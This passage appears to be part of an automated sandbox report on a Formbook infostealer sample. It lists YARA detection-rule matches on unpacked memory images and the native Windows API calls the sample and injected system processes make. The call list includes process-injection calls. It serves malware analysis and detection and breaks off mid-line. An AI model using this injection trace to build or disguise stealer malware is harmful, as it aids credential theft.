          Source: 24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.2.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.2.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.M015Tob0Z8.exe.41c0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.M015Tob0Z8.exe.41c0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.M015Tob0Z8.exe.41c0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.M015Tob0Z8.exe.41c0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.M015Tob0Z8.exe.4190000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.M015Tob0Z8.exe.4190000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.2.2d-hc6qljl.exe.2bc0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.2.2d-hc6qljl.exe.2bc0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.2.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.2.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.1.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.1.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.1.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.1.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.2.2d-hc6qljl.exe.2b80000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.2.2d-hc6qljl.exe.2b80000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.M015Tob0Z8.exe.4190000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.M015Tob0Z8.exe.4190000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 0_2_00458784 NtdllDefWindowProc_A
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 0_2_0043D6BC NtdllDefWindowProc_A,GetCapture
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 0_2_0044D1BC GetSubMenu,SaveDC,RestoreDC,71CCB080,SaveDC,RestoreDC,NtdllDefWindowProc_A
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00419C90 NtCreateFile
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00419D40 NtReadFile
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00419DC0 NtClose
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00419E70 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00419C8A NtCreateFile
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00419D3A NtReadFile
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00419DBA NtClose
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00419EEA NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A798F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A799A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A795D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A796E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A797A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A798A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79820 NtEnumerateKey
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A7B040 NtSuspendThread
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A799D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79950 NtQueueApcThread
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79A10 NtQuerySection
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A7A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79B00 NtSetValueKey
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A795F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A7AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79560 NtWriteFile
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A796D0 NtCreateKey
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79650 NtQueryValueKey
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79FE0 NtCreateMutant
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A7A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79760 NtOpenProcess
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A79770 NtSetInformationFile
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A7A770 NtOpenThread
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_1_00419C90 NtCreateFile
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_1_00419D40 NtReadFile
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_1_00419DC0 NtClose
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_1_00419E70 NtAllocateVirtualMemory
          Source: C:\Windows\explorer.exe Code function: 2_2_04B9D9D2 NtDeleteFile,NtCreateFile,NtClose,NtReadFile,NtClose,NtWriteFile,NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_049999A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_049995D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999560 NtWriteFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_049996D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_049996E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999610 NtEnumerateValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999B00 NtSetValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999770 NtSetInformationFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_049998A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_049998F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0499B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_049999D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_049995F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0499AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999A10 NtQuerySection
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999A20 NtResumeThread
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0499A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_049997A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0499A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0499A770 NtOpenThread
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04999760 NtOpenProcess
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_008A9C90 NtCreateFile
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_008A9DC0 NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_008A9D40 NtReadFile
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_008A9E70 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_008A9C8A NtCreateFile
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_008A9DBA NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_008A9D3A NtReadFile
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_008A9EEA NtAllocateVirtualMemory
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe Code function: 24_2_0042FE90 NtdllDefWindowProc_A
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe Code function: 24_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 0_2_0040C340
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 0_2_00452DE0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 0_2_0044D1BC
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 0_2_0046724C
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_0041E11B
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00402D87
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_0041D641
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_0041E645
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00409E30
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A620A0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A4B090
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00AF1002
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A54120
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A3F900
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A6EBB0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A4841F
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A62581
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A4D5E0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe Code function: 1_2_00A30D20
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe